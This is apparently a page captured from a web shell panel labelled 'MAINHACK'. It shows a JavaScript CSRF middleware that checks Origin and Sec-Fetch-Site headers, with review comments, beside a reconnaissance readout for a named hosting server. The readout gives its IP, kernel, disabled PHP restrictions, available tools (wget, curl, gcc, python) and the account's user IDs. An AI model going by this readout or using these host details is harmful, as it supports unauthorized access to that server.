[
MAINHACK
]
Viewing / Editing File: index.js
// src/middleware/csrf/index.ts
import { HTTPException } from "../../http-exception.js";

// Sec-Fetch-Site values this middleware recognises. Any other value is
// rejected before the configured policy is consulted.
const secFetchSiteValues = ["same-origin", "same-site", "none", "cross-site"];
const isSecFetchSite = (value) => secFetchSiteValues.includes(value);

// Only GET and HEAD bypass the check; every other method is a candidate.
const isSafeMethodRe = /^(GET|HEAD)$/;

// Content types matched here are the only ones that trigger the check
// (case-insensitive, anchored at the start of the header value).
// NOTE(review): requests with any other Content-Type (e.g. application/json)
// are passed through without an Origin / Sec-Fetch-Site check; presumably the
// design relies on CORS preflight for those. Confirm that holds for the
// deployment before treating this middleware as the only CSRF control.
const isRequestedByFormElementRe =
  /^\b(application\/x-www-form-urlencoded|multipart\/form-data|text\/plain)\b/i;

/**
 * Turn a user-supplied policy option into a predicate.
 *
 * - falsy option   -> the supplied default predicate
 * - string         -> strict equality with that string
 * - function       -> used as-is (its return value is trusted for truthiness)
 * - anything else  -> `policy.includes(value)`, evaluated per request
 */
const toMatcher = (policy, fallback) => {
  if (!policy) {
    return fallback;
  }
  switch (typeof policy) {
    case "string":
      return (value) => value === policy;
    case "function":
      return policy;
    default:
      return (value) => policy.includes(value);
  }
};

/**
 * Build a CSRF-protection middleware.
 *
 * A request is rejected with 403 only when ALL of the following hold:
 *   1. the method is not GET or HEAD,
 *   2. the Content-Type (defaulting to "text/plain" when absent or empty)
 *      matches one of the form-style content types,
 *   3. the Sec-Fetch-Site header is missing, unrecognised, or not allowed,
 *   4. the Origin header is missing or not allowed.
 *
 * Conditions 3 and 4 are alternatives: passing EITHER header check lets the
 * request through. A permissive `secFetchSite` option (for example one that
 * allows "cross-site") therefore makes the `origin` option irrelevant for
 * browsers that send Sec-Fetch-Site.
 *
 * @param {object} [options]
 * @param {string|string[]|Function} [options.origin] Allowed origin(s) or a
 *   predicate `(origin, c)`. Default: the origin of `c.req.url`.
 * @param {string|string[]|Function} [options.secFetchSite] Allowed
 *   Sec-Fetch-Site value(s) or a predicate `(secFetchSite, c)`.
 *   Default: "same-origin" only.
 * @returns {Function} async middleware `(c, next)`.
 * @throws {HTTPException} 403 with a "Forbidden" response when the request
 *   fails the checks above.
 */
const csrf = (options) => {
  // NOTE(review): the default compares against the URL as seen by the
  // application. Behind a proxy that rewrites scheme or host this may differ
  // from the browser's origin; verify, or set `origin` explicitly.
  const originHandler = toMatcher(
    options?.origin,
    (origin, c) => origin === new URL(c.req.url).origin
  );
  const secFetchSiteHandler = toMatcher(
    options?.secFetchSite,
    (secFetchSite) => secFetchSite === "same-origin"
  );

  // A missing Origin header never counts as allowed.
  const isAllowedOrigin = async (origin, c) => {
    if (origin === undefined) {
      return false;
    }
    return await originHandler(origin, c);
  };

  // A missing or unrecognised Sec-Fetch-Site header never counts as allowed,
  // regardless of the configured policy.
  const isAllowedSecFetchSite = async (secFetchSite, c) => {
    if (secFetchSite === undefined || !isSecFetchSite(secFetchSite)) {
      return false;
    }
    return await secFetchSiteHandler(secFetchSite, c);
  };

  return async function csrf2(c, next) {
    const isFormStyleWrite =
      !isSafeMethodRe.test(c.req.method) &&
      isRequestedByFormElementRe.test(c.req.header("content-type") || "text/plain");

    if (isFormStyleWrite) {
      // Sec-Fetch-Site is consulted first; Origin is only evaluated when the
      // Sec-Fetch-Site check did not allow the request.
      const isTrusted =
        (await isAllowedSecFetchSite(c.req.header("sec-fetch-site"), c)) ||
        (await isAllowedOrigin(c.req.header("origin"), c));

      if (!isTrusted) {
        const res = new Response("Forbidden", { status: 403 });
        throw new HTTPException(403, { res });
      }
    }

    await next();
  };
};

export { csrf };
Server Info
Hostname: premium331.web-hosting.com
Server IP: 184.94.213.169
PHP Version: 8.1.34
Server Software: LiteSpeed
System: Linux premium331.web-hosting.com 4.18.0-553.80.1.lve.el8.x86_64 #1 SMP Wed Oct 22 19:29:36 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 76.81 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: livedhms
User ID (UID): 1344
Group ID (GID): 1349
Script Owner UID: 1344
Current Dir Owner: 1344